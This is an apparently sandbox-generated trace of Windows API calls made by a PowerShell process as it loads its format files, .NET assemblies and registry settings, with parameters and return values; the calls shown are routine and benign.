	[0167.844] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27cf40 | out: lpFileInformation=0x27cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.845] SetErrorMode (uMode=0x1) returned 0x1
	[0167.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.845] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d028 | out: phkResult=0x27d028*=0x334) returned 0x0
	[0167.845] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cfac, lpData=0x0, lpcbData=0x27cfa8*=0x0 | out: lpType=0x27cfac*=0x1, lpData=0x0, lpcbData=0x27cfa8*=0x56) returned 0x0
	[0167.845] CoTaskMemAlloc (cb=0x5a) returned 0x555eb0
	[0167.845] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf7c, lpData=0x555eb0, lpcbData=0x27cf78*=0x56 | out: lpType=0x27cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cf78*=0x56) returned 0x0
	[0167.845] CoTaskMemFree (pv=0x555eb0) 
	[0167.845] RegCloseKey (hKey=0x334) returned 0x0
	[0167.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0167.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0168.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0168.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0180.528] VirtualQuery (in: lpAddress=0x27bac0, lpBuffer=0x27c980, dwLength=0x30 | out: lpBuffer=0x27c980*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.529] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x7cc0f21b, Data2=0xecce, Data3=0x4c81, Data4=([0]=0xbb, [1]=0x3b, [2]=0xc8, [3]=0x72, [4]=0xf5, [5]=0x82, [6]=0xd8, [7]=0xca))) returned 0x0
	[0180.530] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x490f5c2d, Data2=0xe575, Data3=0x432d, Data4=([0]=0xa8, [1]=0xa8, [2]=0xe7, [3]=0xe4, [4]=0xb4, [5]=0x6a, [6]=0xea, [7]=0xbc))) returned 0x0
	[0180.531] VirtualQuery (in: lpAddress=0x27bc70, lpBuffer=0x27cb30, dwLength=0x30 | out: lpBuffer=0x27cb30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.531] VirtualQuery (in: lpAddress=0x27bc70, lpBuffer=0x27cb30, dwLength=0x30 | out: lpBuffer=0x27cb30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.533] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x1e5eca6f, Data2=0xa21f, Data3=0x4e14, Data4=([0]=0xba, [1]=0x64, [2]=0xeb, [3]=0x63, [4]=0xc7, [5]=0x85, [6]=0xe4, [7]=0xc0))) returned 0x0
	[0180.535] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0xa79f5215, Data2=0xf5c6, Data3=0x46d3, Data4=([0]=0x86, [1]=0x2a, [2]=0xa4, [3]=0x95, [4]=0xb0, [5]=0x3d, [6]=0xa0, [7]=0x96))) returned 0x0
	[0180.535] VirtualQuery (in: lpAddress=0x27bec0, lpBuffer=0x27cd80, dwLength=0x30 | out: lpBuffer=0x27cd80*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.540] VirtualQuery (in: lpAddress=0x27b530, lpBuffer=0x27c3f0, dwLength=0x30 | out: lpBuffer=0x27c3f0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0181.197] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x6ec2f688, Data2=0x7cd5, Data3=0x44f2, Data4=([0]=0x91, [1]=0x7, [2]=0xe8, [3]=0x27, [4]=0x97, [5]=0xb7, [6]=0xfe, [7]=0xc9))) returned 0x0
	[0181.198] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x611b4c29, Data2=0xc511, Data3=0x484f, Data4=([0]=0x9f, [1]=0xbe, [2]=0x16, [3]=0x0, [4]=0x81, [5]=0xa0, [6]=0xd0, [7]=0x3e))) returned 0x0
	[0181.198] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x98c5bfa5, Data2=0xdf07, Data3=0x4924, Data4=([0]=0xb1, [1]=0x2d, [2]=0x17, [3]=0xc4, [4]=0xd2, [5]=0xa, [6]=0x44, [7]=0xf0))) returned 0x0
	[0181.199] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x19d968f0, Data2=0xc22f, Data3=0x4436, Data4=([0]=0x81, [1]=0x70, [2]=0x54, [3]=0xc1, [4]=0x17, [5]=0x88, [6]=0x66, [7]=0xe))) returned 0x0
	[0181.199] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x42688124, Data2=0x1cfa, Data3=0x46a7, Data4=([0]=0x8f, [1]=0xf2, [2]=0xc2, [3]=0xd9, [4]=0x3c, [5]=0x34, [6]=0x4f, [7]=0xea))) returned 0x0
	[0181.200] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x87e89b71, Data2=0x24b5, Data3=0x42e1, Data4=([0]=0xac, [1]=0x93, [2]=0xfd, [3]=0x20, [4]=0x1d, [5]=0x45, [6]=0xa1, [7]=0x16))) returned 0x0
	[0181.200] VirtualQuery (in: lpAddress=0x27bc00, lpBuffer=0x27cac0, dwLength=0x30 | out: lpBuffer=0x27cac0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0181.201] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x44cb7c2a, Data2=0x42fc, Data3=0x45b0, Data4=([0]=0xa7, [1]=0xcc, [2]=0xe8, [3]=0x71, [4]=0x50, [5]=0xe, [6]=0xee, [7]=0x31))) returned 0x0
	[0181.201] VirtualQuery (in: lpAddress=0x27bc00, lpBuffer=0x27cac0, dwLength=0x30 | out: lpBuffer=0x27cac0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0181.202] VirtualQuery (in: lpAddress=0x27bc00, lpBuffer=0x27cac0, dwLength=0x30 | out: lpBuffer=0x27cac0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0191.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.308] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x7d5e0d4e, Data2=0xab6, Data3=0x4163, Data4=([0]=0x92, [1]=0x53, [2]=0xaf, [3]=0xe, [4]=0xf8, [5]=0x6e, [6]=0x1d, [7]=0xe9))) returned 0x0
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.312] VirtualQuery (in: lpAddress=0x27b260, lpBuffer=0x27c120, dwLength=0x30 | out: lpBuffer=0x27c120*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.313] VirtualQuery (in: lpAddress=0x27b2f0, lpBuffer=0x27c1b0, dwLength=0x30 | out: lpBuffer=0x27c1b0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.314] VirtualQuery (in: lpAddress=0x27ba70, lpBuffer=0x27c930, dwLength=0x30 | out: lpBuffer=0x27c930*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.315] VirtualQuery (in: lpAddress=0x27ba70, lpBuffer=0x27c930, dwLength=0x30 | out: lpBuffer=0x27c930*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0191.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0204.457] CoTaskMemAlloc (cb=0x5a) returned 0x1b7932a0
	[0204.457] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf7c, lpData=0x1b7932a0, lpcbData=0x27cf78*=0x56 | out: lpType=0x27cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cf78*=0x56) returned 0x0
	[0204.459] CoTaskMemFree (pv=0x1b7932a0) 
	[0204.461] CoTaskMemAlloc (cb=0x5a) returned 0x1b7932a0
	[0204.461] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf7c, lpData=0x1b7932a0, lpcbData=0x27cf78*=0x56 | out: lpType=0x27cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cf78*=0x56) returned 0x0
	[0204.462] CoTaskMemFree (pv=0x1b7932a0) 
	[0204.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.490] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0205.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
